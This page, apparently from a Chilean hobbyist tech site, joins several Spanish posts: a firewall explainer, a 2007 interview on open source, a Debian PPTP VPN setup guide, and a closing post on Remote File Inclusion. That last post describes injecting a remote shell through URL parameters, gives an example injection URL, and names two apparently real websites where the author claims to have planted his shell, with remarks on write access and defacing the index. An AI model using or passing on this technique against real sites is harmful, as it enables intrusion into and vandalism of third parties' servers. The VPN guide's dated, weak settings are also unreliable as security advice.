www.Newbie.cl

¿Cómo funcionan estas herramientas? ¿Cuáles son sus campos de aplicación? ¿Puede un firewall protegernos contra los virus?
A continuación dare más detalles acerca de estos mecanismos de “”protección”" y configuración.

Desde que las conexiones a Internet de banda ancha han ganado terreno, hemos recibido visitas con regularidad: los intentos de intrusión son mucho más frecuentes de lo que pensamos. Según los sorprendentes datos de un estudio publicado por Symantec, los intentos de intrusión acaecidos en tan sólo unos meses pueden contarse por millares. Por no hablar del spyware, los virus o los gusanos que surcan Internet en busca de equipos vulnerables con fallos de seguridad conocidos. Contar con un antivirus para hacer frente a todas estas amenazas es indispensable, pero no suficiente. Un firewall ofrece mayor protección contra los riesgos de las conexiones permanentes a Internet. A continuación le explicamos el funcionamiento de esta herramienta tan poco conocida por el público general.

¿Qué es un firewall?
La tarea principal de un firewall consiste en inspeccionar los datos que entran y salen de un equipo. Dicha herramienta actúa a modo de barrera entre el “mundo exterior” (Internet, para ser más precisos) y los datos procedentes del ordenador. Supervisa, autoriza o bloquea los datos en función de su naturaleza, el destinatario o el emisario, o bien su campo de aplicación. Pero, ¿por qué motivo necesitamos protección adicional cuando ya contamos con un antivirus que realiza las inspecciones? Muy sencillo, porque las amenazas provenientes de Internet no se limitan sólo a virus, gusanos o spyware: también se presentan en forma de diversas amenazas de intrusiones, como por ejemplo la explotación de los puntos débiles del software o el acceso a servicios no concebidos para uso compartido.

Diversos métodos de filtrado
Para cumplir con su papel de guardián, un firewall utiliza diversos métodos de filtrado. Denominado “filtrado de paquetes”, el primer método consiste en analizar las direcciones IP de los emisores y los receptores de datos, el tipo de paquete (mediante el protocolo TCP) y el número de puerto utilizado para la transferencia de estos datos. Este método se completa con el “filtrado dinámico” que, además de llevar a cabo una vigilancia independiente de los paquetes, supervisa los otros intercambios. Con el fin de asegurar una protección mejorada, la mayoría de los firewalls también incorporan un “filtrado a nivel de aplicación” que controla el intercambio de los datos mediante distintos tipos de aplicaciones.

Cuando detecta un intento de conexión que no se ajusta a las normas definidas, el firewall lo bloquea automáticamente y alerta al usuario de esta acción. Por ejemplo, si el usuario ha optado por prohibir el servicio FTP (porque considera que no es necesario y también porque su autorización podría causar vulnerabilidades), el firewall bloqueará cualquier intento de conexión mediante este servicio. De igual modo, un firewall puede configurarse para prohibir o autorizar el acceso a determinados sitios Web o servicios, como la realización de descargas o el punto a punto.

Junto con las demás actividades de vigilancia, el firewall abre o cierra los puertos en función de los riesgos que representan. Así por ejemplo, es posible que autorice los puertos 25, 110 y 80 (relacionados con el correo electrónico y las conexiones a Internet), mientras que, a menudo, bloquea el puerto 23 (correspondiente al servicio Telnet que posibilita el acceso remoto) por el peligro que conlleva este servicio de resultar víctima de un secuestro. Los firewalls también pueden gestionar los derechos de acceso de los usuarios autorizados para conectarse al sistema.

Espero los oriente un poquito en el tema

Bueno, Hoy 27-08-2007 he realizado una mini entrevista a Juan, el es una de las personas mas motivadas por el tema del opensource, Fiel Participante de Liberacion Digital, y uno de los mas luchadores a la hora de intentar que no nos dominen las grandes corporaciones obligandonos a pagar por usar productos que no sirven del todo, bueno aca les dejo la entrevista.

1-Cuentame cual a sido tu Proyecto Open Source, “mas importante”
No he tenido la experiencia de trabajar en el desarrollo de un proyecto Open Source, aun que me encantaría.

2-Como a sido tu experiencia con el Open Source.
Desde que entre al mundo del desarrollo web que he estado utilizando aplicaciones Open Source, pero lamentablemente me he dado cuenta que las empresas chilenas no son capaces de donar dinero a los creadores de estas aplicaciones, aun que ganen millones de pesos con ellas. Es por esto que he donado a instituciones como Joomla!, Wikipedia y Creative Commons

3-Como a sido tu experiencia, al entregar las cartas a la presidencia (Gobierno De chile) øha habido resultados positivos?
En el caso de Liberación Digital se han obtenido varios resultados positivos, no se si todos a causa de la entrega de la carta a la presidenta. Pero por ejemplo 3 representantes del movimientos fueron citados en el congreso para hablar sobre el tema con unos diputados y el mismo ministro (que esa vez se ausentó), pero hace unas horas llego un correo del ministro Alejandro Ferreiro citando nuevamente a 3 de nuestros representantes al ministerio. Esperemos resulte lo mejor para todos.

4-Has tenido que utilizar alguna vez software que no correspondan a open source, es decir “Licenciados”
He trabajado en 3 agencias, en la primera los primeros meses utilicé Windows hasta que me dieron la autorización de instalar Linux (en ese tiempo era SlackWare). en el trabajo actual estoy utilizando Ubuntu. Hace ya un año aproximadamente que no utilizo ningún tipo de aplicaciones Microsoft, esa era mi meta y la he logrado.
Actualmente si uso software propietario, ya que tengo un Mac. Mi filosofía es su uso software propietario que sea bueno, por eso que no uso nada Microsoft.

5-Que opinion te merece la actitud de grandes corporaciones frente al rechazo al open Source
Básicamente creo esto pasa por falta de información, o derechamente miedo a competir contra el Open Source.
Ya que está archi comprobado el éxito de empresas que se han lanzado a utilizar aplicaciones Open Source.

6-En Europa ya los gobiernos estan caminando hacia el Open Source, øSimple Moda, Tema Economico o Evolucion tecnologica?
Creo que ningún gobierno realiza cambios por simple moda, creo que netamente es evolución tecnológica, obviamente apoyado por el tema económico.

7-Crees que el Open Source esta listo para ser usado por usuarios inexpertos o aun le falta madurar
Creo que ya hace un tiempo plataformas Open Source están lista para ser usadas por usuarios inexpertos, tenemos el conocido caso del proyecto Ubuntu “Linux para seres humanos”, esta es una excelente distribución que está orientada a que la pueda usar cualquier persona sin conocimientostécnicos de Linux, una variante muy interesante es Ubuntu Studio, una distribución Ubuntu orientada a las personas que realizan trabajos multimedia.

8-Por ultimo, Recomendarias el uso de software libre, øPorque? Y øQuÈ distribucion recomiendas para los usuarios mas novatos?
Recomiendo 100% el uso de software libre, básicamente por que de cierta forma eres mas libre, no le regalas tu dinero a empresas que lo único que les importa es lucrar. Las aplicaciones Open Source son trabajos colaborativos, es decir que siempre están saliendo versiones mejoradas y también por que hay aplicaciones SoftWare Libre que son muchos mejores que aplicaciones licenciadas.
Como comentaba en el punto anterior lejos la distribución de Linux recomendada para los usuarios que se inician en este mundo, además de tener mucha documentación es Ubuntu.

Fin.
*************************************

Por ahora esto, de esta forma podremos conocer las opiniones de personajes que llevan mucho mas tiempo que nosotros en el tema del OpenSource

En esta seccion se explicara de manera simple como instalar un servidor VPN en debian con cifrado de datos y modulo MPPE.

Nota: Esto esta probado y funcionando en un server Debian etch 4.0, kernel 2.6.18-4-686

Manos a la obra:

Lo primero instalaremos el servicio pptpd de la siguiente manera en debian:

newbie:~#apt-get install pptpd

Una vez realizado la instalacion procederemos a editar los archivos de configuracion, el cual seria :
newbie:~#/etc/pptpd.conf
Estas serian las lineas que deberian quedar descomentadas:
ppp /usr/sbin/pppd
option /etc/ppp/pptpd-options
logwtmp
localip 10.0.0.1
remoteip 10.0.0.100-200

En las lineas localip se indica la direccion IP del servidor de VPN y en la linea remoteip el rango de direcciones que se asignaran a los clientes que se conecten# no necesariamente tiene que ser el mismo rango del servidor, pero si se quiere conectarse a algunos servicios de la red interna necesariamente deberia estar en el mismo rango.

Luego de editar el archivo hay que guardarlo esto depende en que editor ocuparemos.

Ahora procederemos a editar el archivo de configuracion de ppp el cual seria:
newbie:~#nano /etc/ppp/pptpd-options
En este archivo deberia quedar de la siguiente forma:

name pptpd #nombre que le asignaremos al server VPN
refuse-pap
refuse-chap
refuse-mschap
require-mschap-v2 #autenticacion de protocolo de microsoft([Microsoft
# Challenge Handshake Authentication Protocol)
require-mppe-128 #Encriptacion de 128 bits
ms-dns 192.168.100.1 #servidores de DNS que se asignaran a los usuarios
proxyarp
nodefaultroute
lock
nobsdcomp

Cualquier otra linea que aparesca debe ser comentada.
Ahora procederemos a crear las cuentas para que los usuarios se conecten
El archivo que maneja los usuario es:

newbie:~#nano /etc/ppp/chap-secrets
Ojo nano es un editor.
La forma de crear los usuario seria de la siguiente forma:

# client server secret IP addresses
newbie pptpd test “*”

El primer parametro se indica el nombre de usuario, el segundo es el nombre del servidor VNP el cual configuramos anteriormente, el tercero corresponde a la clave y el cuarto se indica desde que direccion IP se podra conectar este usuario, se asigna la forma “*” para que acepte desde cualquier IP o tambien si el cliente tiene una Ip fija se puede colocar la Ip del cliente “201.238.xxx.xxx” siempre colocando los entreparentesis.

Una vez configuradas las cuentas de usuario es necesario guardar el archivo y con estos datos ya tendriamos configurado el server VPN

Tendriamos que arrancar el servicio:

newbie:~#/etc/init.d/pptpd start

Si arranca sin problemas estaria OK.

Ahora procederiamos a configurar las cuentas para acceder desde afuera desde un equipo W$
Inicio>Panel de control>Conecciones de red>Crear una coneccion nueva
Una vez que abra el asistente de coneccion nueva se debe eligir la opcion de :
Conectarse a mi lugar de trabajo>Coneccion de red privada virtual>Nombre de la coneccion>Colocas la direccion IP del servidor VPN>Agregar un icono en el escritorio>Finalizar.-

Ahora ingresaremos los datos de coneccion que creamos y deberia conectar sin problemas. En caso de no conectar deberias verificar los LOG del server:

tail -f /var/log/messages

Para verificar el problema.

Pronto subire la forma de crear una coneccion pero en Linux……
Ojalas que les sirva a alguien como me a servidor a mi para conectarme a la empresa.
Cualquier duda postear…Suerte¡¡¡¡¡
.::NIDez::.

Bueno ya que estan en esto de saber sobre tecnicas de hacking y cosas asi, aca les dejo un libro que encontre muy bueno que habla sobre el tema de las inyecciones SQL

Tecnicas SQL

RFI (Remote File Inclusion) en español (Inclusion de Archivo remoto), es la tecnica que se aprovecha de una falla en la programacion de paginas web, mediante la cual podemos insertar archivos ingresando algunos parametros por la url, este fallo se logra cuando por algun motivo el webmaster o programador no cierra bien su pagina y sin darse cuenta el hecho que su URL llame a algun archivo y parametro con un simple php?=, php?c=, php?id=…………….etc, si se fijan con el Signo = se esta haciendo referencia a una web o algun archivo, es hay donde nos aprovechamos e insertamos nuestro archivo o sh3ll, si la pagina tiene fallos de RFI entraremos pero no al server ni al index directamente solo podremos ejecutar el archivo que direccionamos si hemos direccionado una SH3LL debemos cerrar la sentencia con un signo ? para que se ejecute en el server y no en nuestro pc,

un ejemplo

http:://web-victima.com/php?id=/mi-web-con-mi-shell?

Pero tampoco es cosa de subir una shell y soltarse a defacear o hacer cosas hay paginas que ya estan protegidas y te hacen un poco mas dicficil el ingreso miren les pongo un ejemplo

esta pagina

http://www2.koillismaa.fi/~juhan/preview.php?file= tiene fallo RFi y le inserte mi shell, pero si se fijan en la parte donde dice Safe mode On es decir con seguridad activa, (No inviolable pero si con seguridad activa)

Ahora si tenemos un poco de suerte nos podemos encontrar con algo asi

http://www.wpfutsal.com/index.php?page= Tiene falo RFi y le inserte mi shell ahora si se fijan donde dice SAFE MODE OFF es decir con la guardia baja y tengo permisos de escritura en muchos de los archivos, con esto puedo hacer un deface modificando el Index

Bueno pongo solo eso por ahora, espero que le aclare un poquito sobre el tema, recuerden que si quieren saber mas solo pregunten y posteamos mas cosas